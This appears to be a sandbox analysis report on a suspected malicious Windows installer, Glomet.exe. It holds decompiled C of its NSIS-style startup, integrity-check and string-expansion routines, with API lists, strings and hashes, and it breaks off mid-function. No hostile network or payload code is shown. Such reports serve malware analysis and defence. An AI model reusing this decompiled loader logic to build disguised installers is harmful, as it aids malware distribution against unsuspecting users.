                                                                                                                                                                              [Figure: control-flow graph of function 00403A3D; legend: Executed / Not Executed]
                                                                                                                                                                              C-Code - Quality: 96%
                                                                                                                                                                              			E00403A3D(void* __eflags) {
                                                                                                                                                                              				intOrPtr _v4;
                                                                                                                                                                              				intOrPtr _v8;
                                                                                                                                                                              				int _v12;
                                                                                                                                                                              				void _v16;
                                                                                                                                                                              				void* __ebx;
                                                                                                                                                                              				void* __edi;
                                                                                                                                                                              				void* __esi;
                                                                                                                                                                              				intOrPtr* _t17;
                                                                                                                                                                              				void* _t25;
                                                                                                                                                                              				void* _t27;
                                                                                                                                                                              				int _t28;
                                                                                                                                                                              				void* _t31;
                                                                                                                                                                              				int _t34;
                                                                                                                                                                              				int _t35;
                                                                                                                                                                              				intOrPtr _t36;
                                                                                                                                                                              				int _t39;
                                                                                                                                                                              				char _t57;
                                                                                                                                                                              				CHAR* _t59;
                                                                                                                                                                              				signed char _t63;
                                                                                                                                                                              				CHAR* _t74;
                                                                                                                                                                              				intOrPtr _t76;
                                                                                                                                                                              				CHAR* _t81;
                                                                                                                                                                              
                                                                                                                                                                              				_t76 =  *0x42f430;
                                                                                                                                                                              				_t17 = E00406663(2);
                                                                                                                                                                              				_t84 = _t17;
                                                                                                                                                                              				if(_t17 == 0) {
                                                                                                                                                                              					_t74 = 0x42a890;
                                                                                                                                                                              					"1033" = 0x30;
                                                                                                                                                                              					 *0x436001 = 0x78;
                                                                                                                                                                              					 *0x436002 = 0;
                                                                                                                                                                              					E0040613E(_t71, __eflags, 0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x42a890, 0);
                                                                                                                                                                              					__eflags =  *0x42a890; // 0x41
                                                                                                                                                                              					if(__eflags == 0) {
                                                                                                                                                                              						E0040613E(_t71, __eflags, 0x80000003, ".DEFAULT\\Control Panel\\International",  &M0040836A, 0x42a890, 0);
                                                                                                                                                                              					}
                                                                                                                                                                              					lstrcatA("1033", _t74);
                                                                                                                                                                              				} else {
                                                                                                                                                                              					E004061B5("1033",  *_t17() & 0x0000ffff);
                                                                                                                                                                              				}
                                                                                                                                                                              				E00403D02(_t71, _t84);
                                                                                                                                                                              				_t80 = "C:\\Users\\hardz\\Pictures\\Cellekammeraten\\PRVEBALLONS\\Omstigningens";
                                                                                                                                                                              				 *0x42f4a0 =  *0x42f438 & 0x00000020;
                                                                                                                                                                              				 *0x42f4bc = 0x10000;
                                                                                                                                                                              				if(E00405CD7(_t84, "C:\\Users\\hardz\\Pictures\\Cellekammeraten\\PRVEBALLONS\\Omstigningens") != 0) {
                                                                                                                                                                              					L16:
                                                                                                                                                                              					if(E00405CD7(_t92, _t80) == 0) {
                                                                                                                                                                              						E004062EA(0, _t74, _t76, _t80,  *((intOrPtr*)(_t76 + 0x118))); // executed
                                                                                                                                                                              					}
                                                                                                                                                                              					_t25 = LoadImageA( *0x42f420, 0x67, 1, 0, 0, 0x8040); // executed
                                                                                                                                                                              					 *0x42ec08 = _t25;
                                                                                                                                                                              					if( *((intOrPtr*)(_t76 + 0x50)) == 0xffffffff) {
                                                                                                                                                                              						L21:
                                                                                                                                                                              						if(E0040140B(0) == 0) {
                                                                                                                                                                              							_t27 = E00403D02(_t71, __eflags);
                                                                                                                                                                              							__eflags =  *0x42f4c0;
                                                                                                                                                                              							if( *0x42f4c0 != 0) {
                                                                                                                                                                              								_t28 = E0040544A(_t27, 0);
                                                                                                                                                                              								__eflags = _t28;
                                                                                                                                                                              								if(_t28 == 0) {
                                                                                                                                                                              									E0040140B(1);
                                                                                                                                                                              									goto L33;
                                                                                                                                                                              								}
                                                                                                                                                                              								__eflags =  *0x42ebec; // 0x0
                                                                                                                                                                              								if(__eflags == 0) {
                                                                                                                                                                              									E0040140B(2);
                                                                                                                                                                              								}
                                                                                                                                                                              								goto L22;
                                                                                                                                                                              							}
                                                                                                                                                                              							ShowWindow( *0x42a870, 5); // executed
                                                                                                                                                                              							_t34 = E004065F5("RichEd20"); // executed
                                                                                                                                                                              							__eflags = _t34;
                                                                                                                                                                              							if(_t34 == 0) {
                                                                                                                                                                              								E004065F5("RichEd32");
                                                                                                                                                                              							}
                                                                                                                                                                              							_t81 = "RichEdit20A";
                                                                                                                                                                              							_t35 = GetClassInfoA(0, _t81, 0x42ebc0);
                                                                                                                                                                              							__eflags = _t35;
                                                                                                                                                                              							if(_t35 == 0) {
                                                                                                                                                                              								GetClassInfoA(0, "RichEdit", 0x42ebc0);
                                                                                                                                                                              								 *0x42ebe4 = _t81;
                                                                                                                                                                              								RegisterClassA(0x42ebc0);
                                                                                                                                                                              							}
                                                                                                                                                                              							_t36 =  *0x42ec00; // 0x0
                                                                                                                                                                              							_t39 = DialogBoxParamA( *0x42f420, _t36 + 0x00000069 & 0x0000ffff, 0, E00403DDA, 0); // executed
                                                                                                                                                                              							E0040398D(E0040140B(5), 1);
                                                                                                                                                                              							return _t39;
                                                                                                                                                                              						}
                                                                                                                                                                              						L22:
                                                                                                                                                                              						_t31 = 2;
                                                                                                                                                                              						return _t31;
                                                                                                                                                                              					} else {
                                                                                                                                                                              						_t71 =  *0x42f420;
                                                                                                                                                                              						 *0x42ebc4 = E00401000;
                                                                                                                                                                              						 *0x42ebd0 =  *0x42f420;
                                                                                                                                                                              						 *0x42ebd4 = _t25;
                                                                                                                                                                              						 *0x42ebe4 = 0x40a1f4;
                                                                                                                                                                              						if(RegisterClassA(0x42ebc0) == 0) {
                                                                                                                                                                              							L33:
                                                                                                                                                                              							__eflags = 0;
                                                                                                                                                                              							return 0;
                                                                                                                                                                              						}
                                                                                                                                                                              						SystemParametersInfoA(0x30, 0,  &_v16, 0);
                                                                                                                                                                              						 *0x42a870 = CreateWindowExA(0x80, 0x40a1f4, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x42f420, 0);
                                                                                                                                                                              						goto L21;
                                                                                                                                                                              					}
                                                                                                                                                                              				} else {
                                                                                                                                                                              					_t71 =  *(_t76 + 0x48);
                                                                                                                                                                              					_t86 = _t71;
                                                                                                                                                                              					if(_t71 == 0) {
                                                                                                                                                                              						goto L16;
                                                                                                                                                                              					}
                                                                                                                                                                              					_t74 = 0x42e3c0;
                                                                                                                                                                              					E0040613E(_t71, _t86,  *((intOrPtr*)(_t76 + 0x44)), _t71,  *((intOrPtr*)(_t76 + 0x4c)) +  *0x42f458, 0x42e3c0, 0);
                                                                                                                                                                              					_t57 =  *0x42e3c0; // 0x45
                                                                                                                                                                              					if(_t57 == 0) {
                                                                                                                                                                              						goto L16;
                                                                                                                                                                              					}
                                                                                                                                                                              					if(_t57 == 0x22) {
                                                                                                                                                                              						_t74 = 0x42e3c1;
                                                                                                                                                                              						 *((char*)(E00405C14(0x42e3c1, 0x22))) = 0;
                                                                                                                                                                              					}
                                                                                                                                                                              					_t59 = lstrlenA(_t74) + _t74 - 4;
                                                                                                                                                                              					if(_t59 <= _t74 || lstrcmpiA(_t59, ?str?) != 0) {
                                                                                                                                                                              						L15:
                                                                                                                                                                              						E00406257(_t80, E00405BE9(_t74));
                                                                                                                                                                              						goto L16;
                                                                                                                                                                              					} else {
                                                                                                                                                                              						_t63 = GetFileAttributesA(_t74);
                                                                                                                                                                              						if(_t63 == 0xffffffff) {
                                                                                                                                                                              							L14:
                                                                                                                                                                              							E00405C30(_t74);
                                                                                                                                                                              							goto L15;
                                                                                                                                                                              						}
                                                                                                                                                                              						_t92 = _t63 & 0x00000010;
                                                                                                                                                                              						if((_t63 & 0x00000010) != 0) {
                                                                                                                                                                              							goto L15;
                                                                                                                                                                              						}
                                                                                                                                                                              						goto L14;
                                                                                                                                                                              					}
                                                                                                                                                                              				}
                                                                                                                                                                              			}

                                                                                                                                                                              0x00403cdf
                                                                                                                                                                              0x00403c54
                                                                                                                                                                              0x00403c5f
                                                                                                                                                                              0x00403c64
                                                                                                                                                                              0x00403c66
                                                                                                                                                                              0x00403c6d
                                                                                                                                                                              0x00403c6d
                                                                                                                                                                              0x00403c78
                                                                                                                                                                              0x00403c80
                                                                                                                                                                              0x00403c82
                                                                                                                                                                              0x00403c84
                                                                                                                                                                              0x00403c8d
                                                                                                                                                                              0x00403c90
                                                                                                                                                                              0x00403c96
                                                                                                                                                                              0x00403c96
                                                                                                                                                                              0x00403c9c
                                                                                                                                                                              0x00403cb5
                                                                                                                                                                              0x00403cc6
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00403ccb
                                                                                                                                                                              0x00403c33
                                                                                                                                                                              0x00403c35
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00403baa
                                                                                                                                                                              0x00403baa
                                                                                                                                                                              0x00403bb6
                                                                                                                                                                              0x00403bc0
                                                                                                                                                                              0x00403bc6
                                                                                                                                                                              0x00403bcb
                                                                                                                                                                              0x00403bda
                                                                                                                                                                              0x00403cf8
                                                                                                                                                                              0x00403cf8
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00403cf8
                                                                                                                                                                              0x00403be9
                                                                                                                                                                              0x00403c24
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00403c24
                                                                                                                                                                              0x00403aec
                                                                                                                                                                              0x00403aec
                                                                                                                                                                              0x00403aef
                                                                                                                                                                              0x00403af1
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00403afb
                                                                                                                                                                              0x00403b0b
                                                                                                                                                                              0x00403b10
                                                                                                                                                                              0x00403b17
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00403b1b
                                                                                                                                                                              0x00403b1d
                                                                                                                                                                              0x00403b2a
                                                                                                                                                                              0x00403b2a
                                                                                                                                                                              0x00403b32
                                                                                                                                                                              0x00403b38
                                                                                                                                                                              0x00403b60
                                                                                                                                                                              0x00403b68
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00403b4a
                                                                                                                                                                              0x00403b4b
                                                                                                                                                                              0x00403b54
                                                                                                                                                                              0x00403b5a
                                                                                                                                                                              0x00403b5b
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00403b5b
                                                                                                                                                                              0x00403b56
                                                                                                                                                                              0x00403b58
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00403b58
                                                                                                                                                                              0x00403b38

                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 00406663: GetModuleHandleA.KERNEL32(?,00000000,?,004034F5,0000000B), ref: 00406675
                                                                                                                                                                                • Part of subcall function 00406663: GetProcAddress.KERNEL32(00000000,?), ref: 00406690
                                                                                                                                                                              • lstrcatA.KERNEL32(1033,ARBEJDSTILLADELSER Setup: Installing,80000001,Control Panel\Desktop\ResourceLocale,00000000,ARBEJDSTILLADELSER Setup: Installing,00000000,00000002,7620FA90,C:\Users\user\AppData\Local\Temp\,?,"C:\programdata\Glomet.exe" ,00000009,0000000B), ref: 00403AB8
                                                                                                                                                                              • lstrlenA.KERNEL32(ExecToStack,?,?,?,ExecToStack,00000000,C:\Users\user\Pictures\Cellekammeraten\PRVEBALLONS\Omstigningens,1033,ARBEJDSTILLADELSER Setup: Installing,80000001,Control Panel\Desktop\ResourceLocale,00000000,ARBEJDSTILLADELSER Setup: Installing,00000000,00000002,7620FA90), ref: 00403B2D
                                                                                                                                                                              • lstrcmpiA.KERNEL32(?,.exe,ExecToStack,?,?,?,ExecToStack,00000000,C:\Users\user\Pictures\Cellekammeraten\PRVEBALLONS\Omstigningens,1033,ARBEJDSTILLADELSER Setup: Installing,80000001,Control Panel\Desktop\ResourceLocale,00000000,ARBEJDSTILLADELSER Setup: Installing,00000000), ref: 00403B40
                                                                                                                                                                              • GetFileAttributesA.KERNEL32(ExecToStack,?,"C:\programdata\Glomet.exe" ,00000009,0000000B), ref: 00403B4B
                                                                                                                                                                              • LoadImageA.USER32 ref: 00403B94
                                                                                                                                                                                • Part of subcall function 004061B5: wsprintfA.USER32 ref: 004061C2
                                                                                                                                                                              • RegisterClassA.USER32 ref: 00403BD1
                                                                                                                                                                              • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 00403BE9
                                                                                                                                                                              • CreateWindowExA.USER32 ref: 00403C1E
                                                                                                                                                                              • ShowWindow.USER32(00000005,00000000,?,"C:\programdata\Glomet.exe" ,00000009,0000000B), ref: 00403C54
                                                                                                                                                                              • GetClassInfoA.USER32 ref: 00403C80
                                                                                                                                                                              • GetClassInfoA.USER32 ref: 00403C8D
                                                                                                                                                                              • RegisterClassA.USER32 ref: 00403C96
                                                                                                                                                                              • DialogBoxParamA.USER32 ref: 00403CB5
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000001D.00000002.575890944.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                              • Associated: 0000001D.00000002.575844664.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.576063119.0000000000408000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.576133488.000000000040A000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.577041699.000000000042C000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.577174379.0000000000431000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.577257988.0000000000435000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.577403934.0000000000446000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.577502312.0000000000448000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_29_2_400000_Glomet.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                                                              • String ID: "C:\programdata\Glomet.exe" $.DEFAULT\Control Panel\International$.exe$1033$ARBEJDSTILLADELSER Setup: Installing$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Pictures\Cellekammeraten\PRVEBALLONS\Omstigningens$Control Panel\Desktop\ResourceLocale$ExecToStack$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                                                                                                                                                              • API String ID: 1975747703-1442869569
                                                                                                                                                                              • Opcode ID: 5d1d30c75a064e7bda6b95d80f93f8a0715b3eed65dfff273a47cad5aa74555f
                                                                                                                                                                              • Instruction ID: 6db815c1d0a977664f3d39510f8e98c50f9dfcfb4850e4c10674fdff383f0bc2
                                                                                                                                                                              • Opcode Fuzzy Hash: 5d1d30c75a064e7bda6b95d80f93f8a0715b3eed65dfff273a47cad5aa74555f
                                                                                                                                                                              • Instruction Fuzzy Hash: C061B9716442046EE620BF669D46F373A7CEB54709F40443FF941B62D3CB7CA9069A2D
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                              • Executed
                                                                                                                                                                              • Not Executed
                                                                                                                                                                              control_flow_graph 376 402f0c-402f5a GetTickCount GetModuleFileNameA call 405dea 379 402f66-402f94 call 406257 call 405c30 call 406257 GetFileSize 376->379 380 402f5c-402f61 376->380 388 402f9a 379->388 389 40307f-40308d call 402ea8 379->389 381 40313c-403140 380->381 391 402f9f-402fb6 388->391 395 4030e2-4030e7 389->395 396 40308f-403092 389->396 393 402fb8 391->393 394 402fba-402fc3 call 403355 391->394 393->394 402 4030e9-4030f1 call 402ea8 394->402 403 402fc9-402fd0 394->403 395->381 398 403094-4030ac call 40336b call 403355 396->398 399 4030b6-4030e0 GlobalAlloc call 40336b call 403143 396->399 398->395 424 4030ae-4030b4 398->424 399->395 423 4030f3-403104 399->423 402->395 407 402fd2-402fe6 call 405da5 403->407 408 40304c-403050 403->408 413 40305a-403060 407->413 427 402fe8-402fef 407->427 412 403052-403059 call 402ea8 408->412 408->413 412->413 418 403062-40306c call 40671a 413->418 419 40306f-403077 413->419 418->419 419->391 422 40307d 419->422 422->389 428 403106 423->428 429 40310c-403111 423->429 424->395 424->399 427->413 431 402ff1-402ff8 427->431 428->429 433 403112-403118 429->433 431->413 432 402ffa-403001 431->432 432->413 434 403003-40300a 432->434 433->433 435 40311a-403135 SetFilePointer call 405da5 433->435 434->413 436 40300c-40302c 434->436 439 40313a 435->439 436->395 438 403032-403036 436->438 440 403038-40303c 438->440 441 40303e-403046 438->441 439->381 440->422 440->441 441->413 442 403048-40304a 441->442 442->413
                                                                                                                                                                              C-Code - Quality: 80%
                                                                                                                                                                              			E00402F0C(void* __eflags, signed int _a4) {
                                                                                                                                                                              				DWORD* _v8;
                                                                                                                                                                              				DWORD* _v12;
                                                                                                                                                                              				void* _v16;
                                                                                                                                                                              				intOrPtr _v20;
                                                                                                                                                                              				long _v24;
                                                                                                                                                                              				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				signed int _v44;
				long _t43;
				signed int _t50;
				void* _t53;
				void* _t57;
				intOrPtr* _t59;
				long _t60;
				signed int _t65;
				signed int _t70;
				signed int _t71;
				signed int _t77;
				intOrPtr _t80;
				long _t82;
				signed int _t85;
				signed int _t87;
				void* _t89;
				signed int _t90;
				signed int _t93;
				void* _t94;

				_t82 = 0;
				_v12 = 0;
				_v8 = 0;
				_t43 = GetTickCount();
				_t91 = "C:\\programdata\\Glomet.exe";
				 *0x42f42c = _t43 + 0x3e8;
				GetModuleFileNameA(0, "C:\\programdata\\Glomet.exe", 0x400);
				_t89 = E00405DEA(_t91, 0x80000000, 3);
				_v16 = _t89;
				 *0x40a018 = _t89;
				if(_t89 == 0xffffffff) {
					return "Error launching installer";
				}
				_t92 = "C:\\programdata";
				E00406257("C:\\programdata", _t91);
				E00406257(0x437000, E00405C30(_t92));
				_t50 = GetFileSize(_t89, 0);
				__eflags = _t50;
				 *0x42944c = _t50;
				_t93 = _t50;
				if(_t50 <= 0) {
					L24:
					E00402EA8(1);
					__eflags =  *0x42f434 - _t82;
					if( *0x42f434 == _t82) {
						goto L29;
					}
					__eflags = _v8 - _t82;
					if(_v8 == _t82) {
						L28:
						_t53 = GlobalAlloc(0x40, _v24); // executed
						_t94 = _t53;
						E0040336B( *0x42f434 + 0x1c);
						_push(_v24);
						_push(_t94);
						_push(_t82);
						_push(0xffffffff); // executed
						_t57 = E00403143(); // executed
						__eflags = _t57 - _v24;
						if(_t57 == _v24) {
							__eflags = _v44 & 0x00000001;
							 *0x42f430 = _t94;
							 *0x42f438 =  *_t94;
							if((_v44 & 0x00000001) != 0) {
								 *0x42f43c =  *0x42f43c + 1;
								__eflags =  *0x42f43c;
							}
							_t40 = _t94 + 0x44; // 0x44
							_t59 = _t40;
							_t85 = 8;
							do {
								_t59 = _t59 - 8;
								 *_t59 =  *_t59 + _t94;
								_t85 = _t85 - 1;
								__eflags = _t85;
							} while (_t85 != 0);
							_t60 = SetFilePointer(_v16, _t82, _t82, 1); // executed
							 *(_t94 + 0x3c) = _t60;
							E00405DA5(0x42f440, _t94 + 4, 0x40);
							__eflags = 0;
							return 0;
						}
						goto L29;
					}
					E0040336B( *0x41d440);
					_t65 = E00403355( &_a4, 4);
					__eflags = _t65;
					if(_t65 == 0) {
						goto L29;
					}
					__eflags = _v12 - _a4;
					if(_v12 != _a4) {
						goto L29;
					}
					goto L28;
				} else {
					do {
						_t90 = _t93;
						asm("sbb eax, eax");
						_t70 = ( ~( *0x42f434) & 0x00007e00) + 0x200;
						__eflags = _t93 - _t70;
						if(_t93 >= _t70) {
							_t90 = _t70;
						}
						_t71 = E00403355(0x415440, _t90);
						__eflags = _t71;
						if(_t71 == 0) {
							E00402EA8(1);
							L29:
							return "Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
						}
						__eflags =  *0x42f434;
						if( *0x42f434 != 0) {
							__eflags = _a4 & 0x00000002;
							if((_a4 & 0x00000002) == 0) {
								E00402EA8(0);
							}
							goto L20;
						}
						E00405DA5( &_v44, 0x415440, 0x1c);
						_t77 = _v44;
						__eflags = _t77 & 0xfffffff0;
						if((_t77 & 0xfffffff0) != 0) {
							goto L20;
						}
						__eflags = _v40 - 0xdeadbeef;
						if(_v40 != 0xdeadbeef) {
							goto L20;
						}
						__eflags = _v28 - 0x74736e49;
						if(_v28 != 0x74736e49) {
							goto L20;
						}
						__eflags = _v32 - 0x74666f73;
						if(_v32 != 0x74666f73) {
							goto L20;
						}
						__eflags = _v36 - 0x6c6c754e;
						if(_v36 != 0x6c6c754e) {
							goto L20;
						}
						_a4 = _a4 | _t77;
						_t87 =  *0x41d440; // 0x52b4c
						 *0x42f4c0 =  *0x42f4c0 | _a4 & 0x00000002;
						_t80 = _v20;
						__eflags = _t80 - _t93;
						 *0x42f434 = _t87;
						if(_t80 > _t93) {
							goto L29;
						}
						__eflags = _a4 & 0x00000008;
						if((_a4 & 0x00000008) != 0) {
							L16:
							_v8 = _v8 + 1;
							_t24 = _t80 - 4; // 0x5
							_t93 = _t24;
							__eflags = _t90 - _t93;
							if(_t90 > _t93) {
								_t90 = _t93;
							}
							goto L20;
						}
						__eflags = _a4 & 0x00000004;
						if((_a4 & 0x00000004) != 0) {
							break;
						}
						goto L16;
						L20:
						__eflags = _t93 -  *0x42944c; // 0x54a40
						if(__eflags < 0) {
							_v12 = E0040671A(_v12, 0x415440, _t90);
						}
						 *0x41d440 =  *0x41d440 + _t90;
						_t93 = _t93 - _t90;
						__eflags = _t93;
					} while (_t93 != 0);
					_t82 = 0;
					__eflags = 0;
					goto L24;
				}
                                                                                                                                                                              			}


                                                                                                                                                                              APIs
                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 00402F1D
                                                                                                                                                                              • GetModuleFileNameA.KERNEL32(00000000,C:\programdata\Glomet.exe,00000400,?,?,004036FD,?,?,00000007,00000009,0000000B), ref: 00402F39
                                                                                                                                                                                • Part of subcall function 00405DEA: GetFileAttributesA.KERNELBASE(00000003,00402F4C,C:\programdata\Glomet.exe,80000000,00000003,?,?,004036FD,?,?,00000007,00000009,0000000B), ref: 00405DEE
                                                                                                                                                                                • Part of subcall function 00405DEA: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,004036FD,?,?,00000007,00000009,0000000B), ref: 00405E10
                                                                                                                                                                              • GetFileSize.KERNEL32(00000000,00000000,00437000,00000000,C:\programdata,C:\programdata,C:\programdata\Glomet.exe,C:\programdata\Glomet.exe,80000000,00000003,?,?,004036FD,?,?,00000007), ref: 00402F85
                                                                                                                                                                              • GlobalAlloc.KERNELBASE(00000040,00000007,?,?,004036FD,?,?,00000007,00000009,0000000B), ref: 004030BB
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000001D.00000002.575890944.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                              • Associated: 0000001D.00000002.575844664.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.576063119.0000000000408000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.576133488.000000000040A000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.577041699.000000000042C000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.577174379.0000000000431000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.577257988.0000000000435000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.577403934.0000000000446000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.577502312.0000000000448000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_29_2_400000_Glomet.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                                                                                                                                              • String ID: "C:\programdata\Glomet.exe" $@TA$C:\Users\user\AppData\Local\Temp\$C:\programdata$C:\programdata\Glomet.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
                                                                                                                                                                              • API String ID: 2803837635-2172206961
                                                                                                                                                                              • Opcode ID: a3529526dccc432a2db2b40383ee9d4975bb57828a7b0874a879935de9d3a064
                                                                                                                                                                              • Instruction ID: 70ffca3bdba6f18ae0426a301ce6e6f0801d42355b595fcaf053b8d4d934ef0e
                                                                                                                                                                              • Opcode Fuzzy Hash: a3529526dccc432a2db2b40383ee9d4975bb57828a7b0874a879935de9d3a064
                                                                                                                                                                              • Instruction Fuzzy Hash: B351D371A01204ABDB20AF64DD85B9B7EBCEB1431AF60813BF500B62D1C7BC9E458B5D
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              Control-flow Graph (legend: Executed / Not Executed)
                                                                                                                                                                              C-Code - Quality: 72%
                                                                                                                                                                              			E004062EA(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8) {
                                                                                                                                                                              				struct _ITEMIDLIST* _v8;
                                                                                                                                                                              				char _v12;
                                                                                                                                                                              				signed int _v16;
                                                                                                                                                                              				signed char _v20;
                                                                                                                                                                              				signed int _v24;
                                                                                                                                                                              				signed char _v28;
                                                                                                                                                                              				signed int _t36;
                                                                                                                                                                              				CHAR* _t37;
                                                                                                                                                                              				signed int _t39;
                                                                                                                                                                              				char _t50;
                                                                                                                                                                              				char _t52;
                                                                                                                                                                              				char _t54;
                                                                                                                                                                              				void* _t62;
                                                                                                                                                                              				char* _t63;
                                                                                                                                                                              				signed int _t77;
                                                                                                                                                                              				intOrPtr _t83;
                                                                                                                                                                              				char _t85;
                                                                                                                                                                              				void* _t86;
                                                                                                                                                                              				CHAR* _t87;
                                                                                                                                                                              				void* _t89;
                                                                                                                                                                              				signed int _t94;
                                                                                                                                                                              				signed int _t96;
                                                                                                                                                                              				void* _t97;
                                                                                                                                                                              
                                                                                                                                                                              				_t89 = __esi;
                                                                                                                                                                              				_t86 = __edi;
                                                                                                                                                                              				_t62 = __ebx;
                                                                                                                                                                              				_t36 = _a8;
                                                                                                                                                                              				if(_t36 < 0) {
                                                                                                                                                                              					_t83 =  *0x42ebfc; // 0x5a1993
                                                                                                                                                                              					_t36 =  *(_t83 - 4 + _t36 * 4);
                                                                                                                                                                              				}
                                                                                                                                                                              				_push(_t62);
                                                                                                                                                                              				_push(_t89);
                                                                                                                                                                              				_push(_t86);
                                                                                                                                                                              				_t63 = _t36 +  *0x42f458;
                                                                                                                                                                              				_t37 = 0x42e3c0;
                                                                                                                                                                              				_t87 = 0x42e3c0;
                                                                                                                                                                              				if(_a4 >= 0x42e3c0) {
                                                                                                                                                                              					_t6 =  &_a4; // 0x422e48
                                                                                                                                                                              					if( *_t6 - 0x42e3c0 < 0x800) {
                                                                                                                                                                              						_t7 =  &_a4; // 0x422e48
                                                                                                                                                                              						_t87 =  *_t7;
                                                                                                                                                                              						_a4 = _a4 & 0x00000000;
                                                                                                                                                                              					}
                                                                                                                                                                              				}
                                                                                                                                                                              				while(1) {
                                                                                                                                                                              					_t85 =  *_t63;
                                                                                                                                                                              					if(_t85 == 0) {
                                                                                                                                                                              						break;
                                                                                                                                                                              					}
                                                                                                                                                                              					__eflags = _t87 - _t37 - 0x400;
                                                                                                                                                                              					if(_t87 - _t37 >= 0x400) {
                                                                                                                                                                              						break;
                                                                                                                                                                              					}
                                                                                                                                                                              					_t63 = _t63 + 1;
                                                                                                                                                                              					__eflags = _t85 - 4;
                                                                                                                                                                              					_a8 = _t63;
                                                                                                                                                                              					if(__eflags >= 0) {
                                                                                                                                                                              						if(__eflags != 0) {
                                                                                                                                                                              							 *_t87 = _t85;
                                                                                                                                                                              							_t87 =  &(_t87[1]);
                                                                                                                                                                              							__eflags = _t87;
                                                                                                                                                                              						} else {
                                                                                                                                                                              							 *_t87 =  *_t63;
                                                                                                                                                                              							_t87 =  &(_t87[1]);
                                                                                                                                                                              							_t63 = _t63 + 1;
                                                                                                                                                                              						}
                                                                                                                                                                              						continue;
                                                                                                                                                                              					}
                                                                                                                                                                              					_t39 =  *((char*)(_t63 + 1));
                                                                                                                                                                              					_t77 =  *_t63;
                                                                                                                                                                              					_t94 = (_t39 & 0x0000007f) << 0x00000007 | _t77 & 0x0000007f;
                                                                                                                                                                              					_v24 = _t77;
                                                                                                                                                                              					_v28 = _t77 | 0x00000080;
                                                                                                                                                                              					_v16 = _t39;
                                                                                                                                                                              					_v20 = _t39 | 0x00000080;
                                                                                                                                                                              					_t63 = _a8 + 2;
                                                                                                                                                                              					__eflags = _t85 - 2;
                                                                                                                                                                              					if(_t85 != 2) {
                                                                                                                                                                              						__eflags = _t85 - 3;
                                                                                                                                                                              						if(_t85 != 3) {
                                                                                                                                                                              							__eflags = _t85 - 1;
                                                                                                                                                                              							if(_t85 == 1) {
                                                                                                                                                                              								__eflags = (_t39 | 0xffffffff) - _t94;
                                                                                                                                                                              								E004062EA(_t63, _t87, _t94, _t87, (_t39 | 0xffffffff) - _t94);
